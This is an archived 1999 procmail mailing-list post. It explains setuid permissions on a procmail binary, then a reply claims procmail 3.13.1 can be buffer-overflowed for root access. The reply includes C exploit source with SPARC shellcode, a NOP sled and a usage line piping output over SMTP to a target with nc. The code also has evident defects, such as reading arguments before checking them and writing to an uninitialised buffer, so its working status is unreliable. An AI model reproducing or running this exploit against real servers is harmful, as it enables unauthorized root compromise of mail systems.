procmail
[Top] [All Lists]

Security Problem? Overflow Procmail v3.13.1

1999-11-19 13:23:02
I got this from a former admin at Goodnet.com.  I must point out that
Goodnet has since re-installed Procmail v3.10.

Felix Tilley
Tucson, Arizona





Felix Tilley <ftilley(_at_)goodnet(_dot_)com> wrote:

In article 
<ftilley-ya02408000R0411990742430001(_at_)news(_dot_)goodnet(_dot_)com>, Felix
Tilley <ftilley(_at_)goodnet(_dot_)com> wrote:

It appears Goodnet has removed Procmail sometime in the last 3 days.  I
hope they are doing some VERY good mail filtering to get rid of the spam.
I used to get 2 to 8 spams per day.  Procmail got rid of almost all of it.


Well, it now appears that Goodnet has upgraded from Promail version 3.10 to
3.13.1.  I am not sure what the difference is.  They installed it
midmorning on Thursday.


cd /bin
ls -l|grep -i proc
-rwsr-sr-x   1 root     mail       78656 Nov  4 10:28 procmail


What does that "s" mean?  Sticky bit?  What does that do?  Does that mean
it is always in memory, or that it isn't eligible for swap-space?

The -'s are split up into three groups. Read Write and Execute for
owner, group, and other (everyone).   The 's' in the case means that
it is SETUID -- The first S; and the second s means SETGID.

What that means to you is that when / if you can run it (which you can
since the last set of three are read and execute) it will run not as
you, but at the person/group that owns this file.  In other words when
you type ./procmail it is running as 'root' & group 'mail' instead of
the normal 'ftilley' - 'users'.

Now a that you know that, you can also note this.  Procmail
has a nice little feature that allows you to 'BUFFER OVERFLOW' it and
get root access.  This work by sending hugh weird amounts of garbage
to procmail and then having procmail dumping core...   When procmail
does this it does not 'switch' permissions back to the user who ran
it, therefore your are now root.

FYI:  I take the 5th!    :)

-- Shawn

P.S.  Here is the code to overflow procmail.


/*
 *  Overflow for procmail 3.13.1
 *
 */

#include <stdio.h>

int main(int argc, char **argv)
{
    long unsigned int large_string[10000];
    int i, prelude;
    unsigned long offset;
    char padding[50];

    offset  = 188;                          /* Magic numbers */
    prelude = atoi(argv[1]);

    if (argc < 2)
    {
        printf("Usage: %s  bufsize <alignment offset> | nc target
25\n",
            argv[0]);
        exit(1);
    }

    for (i = 6; i < (6 + atoi(argv[2])); i++)
    {
        strcat(padding, "A");
    }
    for(i = 0; i < prelude; i++)
    {
        large_string[i] = 0xfffffff0;       /* Illegal instruction */
    }

    large_string[prelude] = 0xf7ffef50;     /* Arbitrary overwrite of
%fp */

    large_string[prelude + 1] = 0xf7fff00c; /* Works for me; address
of code */

    for( i = (prelude + 2); i < (prelude + 64); i++)
    {
        large_string[i] = 0xa61cc013;       /* Lots of sparc NOP's */
    }


        large_string[prelude + 64] = 0x250bcbc8;
        large_string[prelude + 65] = 0xa414af75;
        large_string[prelude + 66] = 0x271cdc88;
        large_string[prelude + 67] = 0xa614ef65;
        large_string[prelude + 68] = 0x291d18c8;
        large_string[prelude + 69] = 0xa8152f72;
        large_string[prelude + 70] = 0x2b1c18c8;
        large_string[prelude + 71] = 0xaa156e72;
        large_string[prelude + 72] = 0x2d195e19;
        large_string[prelude + 73] = 0x900b800e;
        large_string[prelude + 74] = 0x9203a014;
        large_string[prelude + 75] = 0x941ac00b;
        large_string[prelude + 76] = 0x9c03a104;
        large_string[prelude + 77] = 0xe43bbefc;
        large_string[prelude + 78] = 0xe83bbf04;
        large_string[prelude + 79] = 0xec23bf0c;
        large_string[prelude + 80] = 0xdc23bf10;
        large_string[prelude + 81] = 0xc023bf14;
        large_string[prelude + 82] = 0x8210203b;
        large_string[prelude + 83] = 0xaa103fff;
        large_string[prelude + 84] = 0x91d56001;
        large_string[prelude + 85] = 0xa61cc013;
        large_string[prelude + 86] = 0xa61cc013;
        large_string[prelude + 87] = 0xa61cc013;
        large_string[prelude + 88] = 0;

                        /* And finally, the overflow..simple, huh? :)
*/
    printf("helo\n");
    printf("mail from: %s%s\n", padding, large_string);
}


<Prev in Thread] Current Thread [Next in Thread>